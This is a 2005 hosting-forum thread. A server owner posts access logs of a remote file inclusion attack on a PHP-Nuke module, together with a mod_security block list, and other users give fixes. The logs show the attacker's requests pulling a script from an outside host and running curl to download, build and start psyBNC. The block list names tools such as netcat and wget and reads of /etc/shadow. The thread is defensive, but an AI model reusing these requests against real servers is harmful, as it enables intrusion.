server hacked

**parser** · 10-12-2005 11:56 AM

Hello,

today my server hacked,
201.5.212.224 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20lgbos.100free.com/psybnc.tar.gz;tar%20-zxvf%20psybnc.tar.gz HTTP/1.1" 200 14964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:49:52 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc.tar.gz HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:50:54 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz HTTP/1.1" 200 6472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:51:27 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-xvzf%20psybnc.tar.gz HTTP/1.1" 200 15481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:51:42 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;cd%20psybnc;make;pico%20psybnc.conf;./psybnc HTTP/1.1" 200 6129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:52:50 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:53:40 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.geocities.com/sorin_smen/psybnc.tgz HTTP/1.1" 200 6867 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:53:47 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-zxvf%20psybnc.tgz;cd%20psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:54:02 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:54:07 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;ls HTTP/1.1" 200 6147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

i have modsec.user.conf, but is not help. Why?

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
# SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

SecFilter "viewtopic\.php\?" chain
SecFilter "chr$([0-9]{1,3})$" "deny,log"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "

# WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST "/bin/ps"

# WEB-ATTACKS /bin/ps command attempt
SecFilterSelective THE_REQUEST "ps\x20"

# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"

# WEB-ATTACKS uname -a command attempt
SecFilter "uname\x20-a"

# WEB-ATTACKS /usr/bin/id command attempt
SecFilter "/usr/bin/id"

# WEB-ATTACKS id command attempt
SecFilter "\;id"

# WEB-ATTACKS echo command attempt
SecFilter "/bin/echo"

# WEB-ATTACKS kill command attempt
SecFilter "/bin/kill"

# WEB-ATTACKS chmod command attempt
SecFilter "/bin/chmod"

# WEB-ATTACKS chgrp command attempt
SecFilter "/chgrp"

# WEB-ATTACKS chown command attempt
SecFilter "/chown"

# WEB-ATTACKS chsh command attempt
SecFilter "/usr/bin/chsh"

# WEB-ATTACKS tftp command attempt
SecFilter "tftp\x20"

# WEB-ATTACKS /usr/bin/gcc command attempt
SecFilter "/usr/bin/gcc"

# WEB-ATTACKS gcc command attempt
SecFilter "gcc\x20-o"

# WEB-ATTACKS /usr/bin/cc command attempt
SecFilter "/usr/bin/cc"

# WEB-ATTACKS cc command attempt
SecFilter "cc\x20"

# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilter "/usr/bin/cpp"

# WEB-ATTACKS cpp command attempt
SecFilter "cpp\x20"

# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilter "/usr/bin/g\+\+"

# WEB-ATTACKS g++ command attempt
SecFilter "g\+\+\x20"

# WEB-ATTACKS bin/python access attempt
SecFilter "bin/python"

# WEB-ATTACKS python access attempt
SecFilter "python\x20"

# WEB-ATTACKS bin/tclsh execution attempt
SecFilter "bin/tclsh"

# WEB-ATTACKS tclsh execution attempt
SecFilter "tclsh8\x20"

# WEB-ATTACKS bin/nasm command attempt
SecFilter "bin/nasm"

# WEB-ATTACKS nasm command attempt
SecFilter "nasm\x20"

# WEB-ATTACKS /usr/bin/perl execution attempt
SecFilter "/usr/bin/perl"

# WEB-ATTACKS perl execution attempt
SecFilter "perl\x20"

# WEB-ATTACKS nt admin addition attempt
SecFilter "net localgroup administrators /add"

# WEB-ATTACKS traceroute command attempt
SecFilter "traceroute\x20"

# WEB-ATTACKS ping command attempt
SecFilter "/bin/ping"

# WEB-ATTACKS netcat command attempt
SecFilter "nc\x20"

# WEB-ATTACKS nmap command attempt
SecFilter "nmap\x20"

# WEB-ATTACKS xterm command attempt
SecFilter "/usr/X11R6/bin/xterm"

# WEB-ATTACKS X application to remote host attempt
SecFilter "\x20-display\x20"

# WEB-ATTACKS lsof command attempt
SecFilter "lsof\x20"

# WEB-ATTACKS rm command attempt
SecFilter "rm\x20"

# WEB-ATTACKS mail command attempt
SecFilter "/bin/mail"

# WEB-ATTACKS mail command attempt
SecFilter "mail\x20"

# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST "/bin/ls"

# WEB-ATTACKS /etc/inetd.conf access
SecFilter "/etc/inetd\.conf" log,pass

# WEB-ATTACKS /etc/motd access
SecFilter "/etc/motd" log,pass

# WEB-ATTACKS /etc/shadow access
SecFilter "/etc/shadow" log,pass

# WEB-ATTACKS conf/httpd.conf attempt
SecFilter "conf/httpd\.conf" log,pass

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup" log,pass

#PHP-NUKE spam filter
SecFilter "name=WebMail"

#PHP-NUKE web attack
SecFilter "cd%20/var/tmp;"

#PHP-NUKE web attack
SecFilter "cd%20/var/tmp"

#PHP-NUKE web attack
SecFilter "cd%20/tmp"

#PHP-NUKE web attack
SecFilter "chmod%204777"

# phpbb2 shell exploit
SecFilter "rush="
SecFilter "highlight=%2527"
SecFilter "highlight=%2725"
SecFilter "highlight=%27"

**linux-image** · 10-12-2005 03:37 PM

check if LoadModule is active at the httpd.conf.

**sh4ka** · 10-12-2005 04:03 PM

You should better check if the Addmodule mod_security is not commented or if it exists at the AddModule section. Also try to activate all process listed on "background process killer" at "System Health" in the left WHM menu.

Is your Mod security installed from the Add on in WHM ??

**neta5** · 10-12-2005 05:11 PM

you mean its better that we Turn on these item?
BitchX
bnc
eggdrop
generic-sniffers
guardservices
ircd
psyBNC
ptlink
services

**parser** · 10-12-2005 05:52 PM

Originally Posted by linux-image

check if LoadModule is active at the httpd.conf.

Active, it problem with filtring of mod_secure.

In audit_log (Log of mod_secure), all for example "wget" denied with code 406.

**parser** · 10-12-2005 05:57 PM

Originally Posted by sh4ka

You should better check if the Addmodule mod_security is not commented or if it exists at the AddModule section. Also try to activate all process listed on "background process killer" at "System Health" in the left WHM menu.

Is your Mod security installed from the Add on in WHM ??

Yes, installed from WHM.
I Activated all process listed on "background process killer". Thanks!

**domtaj** · 10-13-2005 11:16 AM

The file got dropped by way of curl, so better put

SecFilterSelective THE_REQUEST "curl "

into mod_security's conf file

as that will also stop other non detected drops

LinkBack

Thread Tools

server hacked

my server is hacked

server has been hacked

Server get hacked

my server got hacked?

new server got hacked